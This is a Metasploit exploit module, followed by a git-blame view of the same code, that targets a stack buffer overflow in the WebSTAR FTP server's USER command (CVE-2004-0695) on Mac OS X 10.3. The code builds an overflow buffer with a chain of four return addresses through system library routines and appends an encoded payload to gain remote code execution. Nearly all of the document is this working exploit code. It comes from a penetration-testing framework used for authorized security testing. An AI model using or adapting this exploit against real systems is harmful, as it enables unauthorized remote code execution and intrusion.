metasploit-framework/modules/exploits/osx/ftp/webstar_ftp_user.rb

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Ftp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WebSTAR FTP Server USER Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the logging routine
        of the WebSTAR FTP server. Reliable code execution is
        obtained by a series of hops through the System library.
      },
      'Author'         => [ 'ddz', 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2004-0695'],
          [ 'OSVDB', '7794'],
          [ 'BID', '10720'],

        ],
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 300,
          'BadChars' => "\x00\x20\x0a\x0d",
          'Compat'   =>
            {
              'ConnectionType' => "+find"
            },
        },
      'Platform'      => %w{ osx },
      'Targets'        =>
        [
          [
            'Mac OS X 10.3.4-10.3.6',
            {
              'Platform'     => 'osx',
              'Arch'          => ARCH_PPC,
              'Rets'          => [ 0x9008dce0, 0x90034d60, 0x900ca6d8, 0x90023590 ],
            },
          ],
        ],
      'DisclosureDate' => 'Jul 13 2004',
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('MHOST', [ false, "Our IP address or hostname as the target resolves it" ]),
      ], self)
  end

  # crazy dino 5-hop foo
  #$ret = pack('N', 0x9008dce0); # call $r28, jump r1+120
  #$r28 = pack('N', 0x90034d60); # getgid()
  #$ptr = pack('N', 0x900ca6d8); # r3 = r1 + 64, call $r30
  #$r30 = pack('N', 0x90023590); # call $r3

  def exploit
    connect

    # The offset to the return address is dependent on the length of our hostname
    # as the target system resolves it ( IP or reverse DNS ).
    mhost = datastore['MHOST'] || Rex::Socket.source_address(datastore['RHOST'])
    basel =  285 - mhost.length

    print_status("Trying target #{target.name}...")

    #  ret = 296
    # r25  = 260
    # r26  = 264
    # r27  = 268
    # r28  = 272
    # r29  = 276
    # r30  = 280
    # r31  = 284

    # r1+120 = 408

    buf                 = rand_text_alphanumeric(basel + 136 + 56, payload_badchars)
    buf[basel +  24, 4] = [ target['Rets'][0] ].pack('N') # call $r28, jump r1+120
    buf[basel      , 4] = [ target['Rets'][1] ].pack('N') # getgid()
    buf[basel + 136, 4] = [ target['Rets'][2] ].pack('N') # (r1+120) => r3 = r1 + 64, call $r30
    buf[basel + 120, 4] = [ target['Rets'][3] ].pack('N') # call $r3
    buf << payload.encoded

    send_cmd( ['USER', buf] , true )
    send_cmd( ['HELP'] , true )

    handler
    disconnect
  end

end
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`##`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# This module requires Metasploit: http//metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`##`

Changed up the way mixins are handled, all exploits just require 'msf/core' and all current mixins will be loaded. Egghunter was moved to a mixin and generates based on target arch and platform. git-svn-id: file:///home/svn/incoming/trunk@3111 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-26 00:04:26 +00:00			`require 'msf/core'`
Relocated to subdirs, added webstar git-svn-id: file:///home/svn/incoming/trunk@3104 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-25 20:31:34 +00:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`class Metasploit3 < Msf::Exploit::Remote`
Retab modules 2013-08-30 21:28:54 +00:00			`Rank = AverageRanking`

			`include Msf::Exploit::Remote::Ftp`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'WebSTAR FTP Server USER Overflow',`
			`'Description' => %q{`
			`This module exploits a stack buffer overflow in the logging routine`
			`of the WebSTAR FTP server. Reliable code execution is`
			`obtained by a series of hops through the System library.`
			`},`
			`'Author' => [ 'ddz', 'hdm' ],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`[ 'CVE', '2004-0695'],`
			`[ 'OSVDB', '7794'],`
			`[ 'BID', '10720'],`

			`],`
			`'Privileged' => true,`
			`'Payload' =>`
			`{`
			`'Space' => 300,`
			`'BadChars' => "\x00\x20\x0a\x0d",`
			`'Compat' =>`
			`{`
			`'ConnectionType' => "+find"`
			`},`
			`},`
Bug #8419 - Added platform info missing on exploits 2013-10-09 02:41:50 +00:00			`'Platform' => %w{ osx },`
Retab modules 2013-08-30 21:28:54 +00:00			`'Targets' =>`
			`[`
			`[`
			`'Mac OS X 10.3.4-10.3.6',`
			`{`
			`'Platform' => 'osx',`
			`'Arch' => ARCH_PPC,`
			`'Rets' => [ 0x9008dce0, 0x90034d60, 0x900ca6d8, 0x90023590 ],`
			`},`
			`],`
			`],`
			`'DisclosureDate' => 'Jul 13 2004',`
			`'DefaultTarget' => 0))`

			`register_options(`
			`[`
			`OptString.new('MHOST', [ false, "Our IP address or hostname as the target resolves it" ]),`
			`], self)`
			`end`

			`# crazy dino 5-hop foo`
			`#$ret = pack('N', 0x9008dce0); # call $r28, jump r1+120`
			`#$r28 = pack('N', 0x90034d60); # getgid()`
			`#$ptr = pack('N', 0x900ca6d8); # r3 = r1 + 64, call $r30`
			`#$r30 = pack('N', 0x90023590); # call $r3`

			`def exploit`
			`connect`

			`# The offset to the return address is dependent on the length of our hostname`
			`# as the target system resolves it ( IP or reverse DNS ).`
			`mhost = datastore['MHOST'] \|\| Rex::Socket.source_address(datastore['RHOST'])`
			`basel = 285 - mhost.length`

			`print_status("Trying target #{target.name}...")`

			`# ret = 296`
			`# r25 = 260`
			`# r26 = 264`
			`# r27 = 268`
			`# r28 = 272`
			`# r29 = 276`
			`# r30 = 280`
			`# r31 = 284`

			`# r1+120 = 408`

			`buf = rand_text_alphanumeric(basel + 136 + 56, payload_badchars)`
			`buf[basel + 24, 4] = [ target['Rets'][0] ].pack('N') # call $r28, jump r1+120`
			`buf[basel , 4] = [ target['Rets'][1] ].pack('N') # getgid()`
			`buf[basel + 136, 4] = [ target['Rets'][2] ].pack('N') # (r1+120) => r3 = r1 + 64, call $r30`
			`buf[basel + 120, 4] = [ target['Rets'][3] ].pack('N') # call $r3`
			`buf << payload.encoded`

			`send_cmd( ['USER', buf] , true )`
			`send_cmd( ['HELP'] , true )`

			`handler`
			`disconnect`
			`end`
Relocated to subdirs, added webstar git-svn-id: file:///home/svn/incoming/trunk@3104 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-25 20:31:34 +00:00
OSVDB references from Steve Tornio git-svn-id: file:///home/svn/framework3/trunk@7030 4d416f70-5f16-0410-b530-b9f4589650da 2009-09-12 04:22:58 +00:00			`end`